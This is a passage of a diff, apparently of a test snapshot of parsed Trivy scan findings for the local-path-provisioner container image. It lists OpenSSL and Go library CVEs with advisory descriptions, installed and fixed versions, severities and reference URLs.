"https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "openssl: Read buffer overruns processing ASN.1 strings", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Certificate policy check not enabled", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", + "fixedVersion": "1.1.1n-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.1.0", - "packageName": "github.com/prometheus/client_golang", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - 